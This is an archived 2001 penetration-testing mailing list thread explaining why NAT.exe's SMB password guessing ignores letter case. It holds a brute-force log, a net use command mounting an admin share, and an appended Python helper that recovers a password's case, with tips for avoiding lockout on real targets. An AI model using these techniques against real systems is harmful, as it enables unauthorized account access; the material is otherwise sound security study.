Penetration Testing mailing list archives

Re: Using Null Session information from NAT.EXE


From: "bluefur0r bluefur0r" <bluefur0r () drea ms>
Date: 1 Nov 2001 20:19:27 -0000

Ahh, that is correct, capitals do count when using the command-line net use, although authenticating with the Network 
browser does not. Also, one thing I've encountered a lot is that after you authenticate to one host and then attempt to 
authenticate to another, you get "conflicting credentials." To fix this (without rebooting) in 2k, just go to 
Administrative Tools -> Services -> Workstation and restart the service. This will kill Computer Browser as well. But 
hey, it's better than rebooting. Just thought I'd share.
blue

Be careful: after I did this a couple of times rather quickly, it completely bombed my Computer Browser service and I 
couldn't get it back up without a reboot. But if you take your time, it works quite well.

On Thu, 01 Nov 2001 13:36:15 -0500, Windex King <WindexKing () mor-lan-d com> wrote:
Ian,

I have tested a hunch I had about this and I believe this is the answer you're looking for.

Attacking machine: NT 4.0 SP6a
Attacked machine:  W2K no SP

First I confirmed the administrator password on the to-be-attacked machine.

C:\>net user administrator "WindexKing"
The command completed successfully.

** Note: pwd contains capital letters W and K **

Then I attacked using NAT.exe

C:\>nat -o WindexKing.log -u administrator.txt -p WindexKing.pwd 192.168.68.33
[*]--- Reading usernames from administrator.txt
[*]--- Reading passwords from WindexKing.pwd

[*]--- Checking host: 192.168.68.33
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Thu Nov 01 07:49:30 2001
[*]--- Timezone is UTC-5.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `AdminIstrator' Password: `foo'
[*]--- Attempting to connect with Username: `AdminIstrator' Password: `bar'
[*]--- Attempting to connect with Username: `AdminIstrator' Password: `windexking'
[*]--- CONNECTED: Username: `AdminIstrator' Password: `windexking'

Now I tried to use the password found by NAT.exe via net.exe

c:\>net use * \\192.168.68.33\c$ "windexking" /u:administrator
System error 1326 has occurred.

Logon failure: unknown user name or bad password.


c:\>net use * \\192.168.68.33\c$ "WindexKing" /u:administrator
Drive E: is now connected to \\192.168.68.33\c$.

The command completed successfully.


My conclusion:

NAT.exe is forcing LANMAN only authentication and therefore the 
letters taken from the supplied wordlist are converted to uppercase
as LANMAN expects.

NAT.exe doesn't tell you that (other than the "Attempting to connect 
with protocol: MICROSOFT NETWORKS 1.03" line) and simply reports the
word from the wordlist which worked as it is presented in the wordlist.

You can find a Cygwin compiled version of the SAMBA SMBclient at:
http://www.hoobie.net/tools/index.html

W      K

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/



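The case-insensitivity the thread observes is a property of how LM handles the password before it is ever hashed: the password is uppercased, truncated or NUL-padded to 14 bytes, and split into two 7-byte halves that are used as DES keys, so case is discarded up front, whereas the NT hash (and therefore NTLM authentication and net use) is computed over the password as typed. The following is an added example, not code from either poster or from NAT.exe; the function names, the `make_checker` stand-in for a case-sensitive login attempt, and the sample passwords are constructed for illustration. It mimics the LM normalization to show why `windexking` and `WindexKing` are indistinguishable to an LM-only check, then enumerates case variants of a word recovered via LM so that the case-sensitive form can be found for an NTLM login. It does not perform the DES step itself; equality of the normalized input is sufficient to show the two candidates collide.

```python
# Added example: LM-style password normalization and case recovery.
# Not code from the thread or from NAT.exe; names below are illustrative.
from itertools import product
from typing import Callable, Iterator, Optional

LM_MAX_LEN = 14  # LM hashes at most 14 bytes of password


def lm_normalize(password: str) -> bytes:
    """Reproduce the preprocessing LM applies before DES-hashing.

    Uppercase, OEM (here cp437) encode, truncate to 14 bytes, pad with NULs.
    This is accurate for ASCII; upper-casing rules for non-ASCII characters
    differ between Windows OEM code pages and Python's str.upper().
    """
    raw = password.upper().encode("cp437", errors="replace")[:LM_MAX_LEN]
    return raw.ljust(LM_MAX_LEN, b"\x00")


def lm_halves(password: str) -> tuple:
    """Split the normalized password into the two 7-byte DES key halves."""
    blob = lm_normalize(password)
    return blob[:7], blob[7:]


def lm_equivalent(a: str, b: str) -> bool:
    """True if both passwords would produce the same LM hash."""
    return lm_normalize(a) == lm_normalize(b)


def case_variants(word: str) -> Iterator[str]:
    """Yield every case permutation of word (2**n for n letters).

    The all-lowercase form comes first, so a checker that accepts it
    returns immediately.
    """
    alpha_pos = [i for i, c in enumerate(word) if c.isalpha()]
    for bits in product((False, True), repeat=len(alpha_pos)):
        chars = list(word.lower())
        for pos, upper in zip(alpha_pos, bits):
            if upper:
                chars[pos] = chars[pos].upper()
        yield "".join(chars)


def recover_case(lm_word: str, accept: Callable[[str], bool],
                 limit: Optional[int] = None) -> Optional[str]:
    """Find the case-sensitive password behind an LM-derived match.

    accept() stands in for a case-sensitive check (a net use attempt, or a
    comparison against a captured NT hash). limit caps the attempts: the
    search is 2**letters, and each try against a live host counts toward
    the account lockout threshold.
    """
    for n, cand in enumerate(case_variants(lm_word)):
        if limit is not None and n >= limit:
            return None
        if accept(cand):
            return cand
    return None


def make_checker(true_password: str) -> Callable[[str], bool]:
    """Constructed stand-in for the target: a case-sensitive comparison."""
    return lambda candidate: candidate == true_password


if __name__ == "__main__":
    found_by_lm = "windexking"     # the wordlist entry NAT reported
    real_password = "WindexKing"   # constructed: the password actually set
    print("LM halves:", lm_halves(found_by_lm))
    print("LM-equivalent:", lm_equivalent(found_by_lm, real_password))
    print("Recovered:", recover_case(found_by_lm, make_checker(real_password)))
```

Two caveats when applying this against a real target: a password longer than 14 characters has no usable LM hash on the host at all, so an LM-only tool will never match it regardless of wordlist; and the variant search is 2 to the power of the number of letters, so run it offline against a captured NT hash where possible rather than as live logon attempts, which will trip lockout policy long before 1024 tries.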